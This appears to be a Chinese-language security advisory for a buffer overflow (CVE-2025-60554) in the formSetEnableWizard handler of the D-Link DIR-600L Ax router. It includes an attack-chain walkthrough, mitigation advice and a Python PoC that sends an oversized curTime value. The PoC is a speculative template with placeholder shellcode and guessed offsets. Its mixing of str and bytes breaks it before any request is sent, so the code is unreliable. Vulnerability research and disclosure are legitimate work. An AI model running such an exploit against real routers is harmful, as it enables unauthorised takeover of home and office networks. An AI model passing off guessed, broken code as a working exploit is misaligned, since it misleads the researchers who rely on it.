D-Link DIR-600L 路由器 formSetEnableWizard 函数缓冲区溢出漏洞 (CVE-2025-60554)

漏洞信息

漏洞编号

CVE-2025-60554

漏洞类型

缓冲区溢出

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-600L Ax (固件版本 FW116WWb01)

漏洞概述

CVE-2025-60554 是 D-Link DIR-600L Ax 路由器固件中的一个严重缓冲区溢出漏洞。该漏洞存在于 formSetEnableWizard 函数中，攻击者可以通过 curTime 参数注入超长字符串，导致缓冲区溢出。CVSS 评分高达 9.8，属于紧急严重级别。攻击向量为网络层面，无需认证和用户交互即可实现远程利用。攻击成功后可导致设备完全沦陷，攻击者能够执行任意代码、窃取敏感信息、植入后门或将其纳入僵尸网络。由于该路由器通常部署在家庭和小型办公网络环境中，漏洞的存在可能使大量网络面临被入侵的风险。建议用户立即采取防护措施，联系厂商获取安全更新。

技术细节

该漏洞为典型的栈缓冲区溢出（Stack Buffer Overflow）漏洞。在 D-Link DIR-600L Ax 固件 FW116WWb01 的 formSetEnableWizard 函数中，程序直接使用用户提交的 curTime 参数而未进行长度验证。当攻击者发送包含超长字符串的请求时，数据会超出预设缓冲区的边界，覆盖相邻内存区域，包括函数返回地址等关键控制流数据。攻击者可通过精心构造 payload，覆盖返回地址使其指向恶意代码，从而在设备上执行任意命令。由于 Web 管理界面通常监听在 80/443 端口且部分配置允许远程访问，攻击者可直接通过 HTTP 请求触发漏洞。漏洞利用无需认证，简化了攻击链，但需注意目标设备需开启相关管理功能。建议通过固件更新修补此漏洞，厂商应增加边界检查和使用安全字符串处理函数。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者扫描互联网或内网中运行 D-Link DIR-600L Ax 固件 FW116WWb01 的设备，通过识别 HTTP 管理界面确认目标

STEP 2

步骤2: 构造恶意请求

攻击者构造包含超长字符串的 HTTP POST 请求，将恶意 payload 通过 curTime 参数发送到 formSetEnableWizard 端点

STEP 3

步骤3: 触发缓冲区溢出

服务器端程序将超长字符串复制到固定大小的栈缓冲区中，导致相邻内存区域被覆盖，包括函数返回地址

STEP 4

步骤4: 控制流劫持

精心构造的 payload 将返回地址覆盖为指向恶意代码的地址，当函数返回时跳转到攻击者控制的代码执行

STEP 5

步骤5: 远程代码执行

攻击者成功在路由器上执行任意命令，可建立持久化后门、窃取网络流量或将其纳入僵尸网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-60554 PoC - D-Link DIR-600L Ax Buffer Overflow
# Target: formSetEnableWizard function via curTime parameter

import requests
import sys

target = 'http://target-ip'  # Replace with target IP

def exploit_buffer_overflow():
    """
    Buffer overflow in formSetEnableWizard via curTime parameter
    The vulnerability allows overwriting return address on stack
    """
    # Construct malicious payload with long string to overflow buffer
    # Typical buffer size in embedded devices is 256-512 bytes
    overflow_length = 1024
    malicious_time = 'A' * overflow_length
    
    # Additional padding to reach return address offset
    padding = 'B' * 64
    
    # Target address (needs to be adjusted based on firmware)
    return_address = b'\x42\x42\x42\x42'
    
    # Shellcode for MIPS/ARM (device architecture dependent)
    shellcode = b'\x00\x00\x00\x00'  # Placeholder
    
    payload = malicious_time + padding + return_address + shellcode
    
    # HTTP POST request to trigger vulnerability
    data = {
        'curTime': payload,
        'submit': 'Apply'
    }
    
    try:
        response = requests.post(
            f'{target}/formSetEnableWizard',
            data=data,
            timeout=10
        )
        print(f'[+] Request sent, Status: {response.status_code}')
    except requests.exceptions.RequestException as e:
        print(f'[-] Request failed: {e}')

if __name__ == '__main__':
    if len(sys.argv) > 1:
        target = sys.argv[1]
    print(f'[*] Exploiting CVE-2025-60554 on {target}')
    exploit_buffer_overflow()

影响范围

D-Link DIR-600L Ax 固件 FW116WWb01

防御指南

临时缓解措施

立即在路由器管理界面中禁用远程管理功能，仅允许通过本地局域网访问；对于必须远程管理的场景，应使用 VPN 隧道连接后在本地网络访问管理界面；同时在网络边界防火墙上阻断对路由器 80/443 端口的外网访问请求，并持续监控设备日志以发现潜在的入侵尝试。